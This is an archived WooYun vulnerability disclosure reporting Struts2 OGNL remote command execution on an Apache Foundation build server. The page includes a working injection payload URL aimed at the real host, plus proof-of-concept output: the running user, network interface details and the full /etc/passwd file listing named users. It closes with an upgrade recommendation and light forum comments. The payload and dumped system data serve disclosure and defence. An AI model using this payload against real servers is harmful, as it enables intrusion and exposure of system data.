Current:WooYun >> vulnerability information

Overview Followers (19) + Follow

WooYun-2013-00006

: Apache Software Foundation A Subsite Remote command execution

The Apache Software Foundation

猪猪侠

: 2013-09-20 08:33

: 2013-09-25 08:33

: Application misconfiguration

: high

: 20

: notified but neglected by the vendor

http://www.wooyun.org

Remote command execution

0collected by people collect


Details

Disclosure time-line:

2013-09-20: Vendor has been notified, waiting for response
2013-09-25: Vendor has neglected the vulnerability, details opened to the public

Abstract:

# Apache,Mind Yourself

Apache struts2 a vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution。

Details:

#show the webroot



http://vmbuild.apache.org/continuum/groupSummary.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matr%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23matt.getWriter().println(%23matr.getRealPath(%22/%22)),%23matt.getWriter().flush(),%23matt.getWriter().close()}





/home/continuum/apache-continuum-1.4.1/apps/continuum



Proofs of concept:

#id

uid=1001(continuum) gid=1001(continuum) groups=1001(continuum)



#/sbin/ifconfig



eth0      Link encap:Ethernet  HWaddr 00:50:56:ae:00:0b  
inet addr:140.211.11.54 Bcast:140.211.11.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feae:b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:22081926 errors:0 dropped:0 overruns:0 frame:0
TX packets:7627912 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:26173286052 (26.1 GB) TX bytes:3491916802 (3.4 GB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:42196069 errors:0 dropped:0 overruns:0 frame:0
TX packets:42196069 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:24001777186 (24.0 GB) TX bytes:24001777186 (24.0 GB)





#cat /etc/passwd



root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
landscape:x:102:108::/var/lib/landscape:/bin/false
gmcdonald:x:1000:1000:gmcdonald,,,:/home/gmcdonald:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
continuum:x:1001:1001::/home/continuum:/bin/sh
archiva:x:1002:1002::/home/archiva:/bin/sh
postfix:x:104:113::/var/spool/postfix:/bin/false
messagebus:x:105:115::/var/run/dbus:/bin/false
avahi:x:106:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
brett:x:1717:1717::/home/brett:/bin/bash
mysql:x:107:117:MySQL Server,,,:/var/lib/mysql:/bin/false
smmta:x:108:118:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:109:119:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
apbackup:x:1718:1718::/home/apbackup:/bin/sh
pctony:x:2097:2097::/home/pctony:/bin/bash
ntp:x:110:120::/home/ntp:/bin/false
evenisse:x:1003:1003:Emmanuel Venisse,,,:/home/evenisse:/bin/bash
puppet:x:111:121:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
olamy:x:1004:1004:Olivier Lamy,,,:/home/olamy:/bin/bash
usbmux:x:112:46:usbmux daemon,,,:/home/usbmux:/bin/false
markt:x:1787:1787:medthomas:/home/markt:/bin/bash

Solutions:

It is strongly recommended to upgrade to Struts 2.3.15.1, which contains the corrected Struts2-Core library.

http://struts.apache.org/release/2.3.x/docs/s2-016.html

http://struts.apache.org/release/2.3.x/docs/s2-017.html

Copyright:Please repost with source 猪猪侠@Wooyun


Response

Vendor comments:

Hazard rating:neglectable, ignored by vendor

Ignored date:2013-09-20 08:33

Vendor response:

Latest status:

N/A


review the vulnerability:

Give your review of the vulnerability in order to reflect its value better. Reviews can include the subjectivity, complecity, as well as the scholar value of the information.

(0 comments):
You need to sign in to comment

Comments

  1. 2013-08-01 15:22 | 疯狗 ( intern whitehat | no vulnerability yet | xxxxx)
    0

    gelivable!

  2. 2013-08-01 15:23 | VIP ( intern whitehat | Rank:0 vulnerabilities:1 | 用自己的中文签名,让老外去头疼吧!!!!...)
    0

    niubivable!

  3. 2013-08-01 18:30 | imlonghao ( intern whitehat | no vulnerability yet | 



















...)
    0

    Excellent,,

  4. 2013-08-01 22:37 | 0x0F ( intern whitehat | no vulnerability yet | 这个人很聪明,什么证据都没有留下...........)
    0

    what?

  5. 2013-08-01 22:39 | 霸气帝王攻 ( intern whitehat | no vulnerability yet | 专注互联网)
    0

    what's up man?Don't give up . we fucking just do it.you got it?

  6. 2013-08-01 22:44 | 0x0F ( intern whitehat | no vulnerability yet | 这个人很聪明,什么证据都没有留下...........)
    0

    @霸气帝王攻 Public.Civilization,Please.

  7. 2013-08-02 15:12 | 心伤的胖子 ( intern whitehat | no vulnerability yet | 因为心伤,所以胖子。)
    0

    屌炸天! ps:老外会去翻译我说的话么?

  8. 2013-08-03 18:37 | Rookie ( intern whitehat | no vulnerability yet )
    0

    @心伤的胖子 老外会拿谷歌翻译吗

  9. 2013-08-03 19:00 | imlonghao ( intern whitehat | no vulnerability yet | 



















...)
    0

    @Rookie Yes,they will.

  10. 2013-08-03 19:25 | tzrj ( intern whitehat | no vulnerability yet | ส็็็็็็็็็็็็็็็็็็็...)
    0

    我擦 居然留言要验证码 XXXXXXXXXXXXXXXXXXXXXX

  11. 2013-08-03 20:56 | 元芳 ( intern whitehat | no vulnerability yet | 大人,你怎么看?)
    0

    what?

  12. 2013-08-04 22:47 | xiaogui ( intern whitehat | no vulnerability yet | 围观大牛来了~~~)
    0

    diaobaoivable

  13. 2013-08-07 14:49 | 浮生 ( intern whitehat | no vulnerability yet | If you see what I see, if you feel as I ...)
    0

    他们一定看不懂吧。。。

  14. 2013-08-23 19:14 | Lee Swagger ( intern whitehat | no vulnerability yet | 洗洗睡吧)
    0

    so busy艹 ╭︿︿︿╮ {/ o o /} ( (oo) ) ︶ ︶︶

  15. 2013-09-21 11:28 | VIP ( intern whitehat | Rank:0 vulnerabilities:1 | 用自己的中文签名,让老外去头疼吧!!!!...)
    0

    果然自动公开了

  16. 2013-09-23 19:16 | 邪少 ( intern whitehat | no vulnerability yet | QQ:964323781)
    0

    老外。。能看懂我们写的么。。哈

  17. 2013-10-14 19:20 | x0ers ( intern whitehat | no vulnerability yet | 专注计算机:开机关机重启20年。)
    0

    test

  18. 2013-11-28 16:32 | jaojan ( intern whitehat | no vulnerability yet | xss my life)
    0

    nice

Want to comment? Please sign in .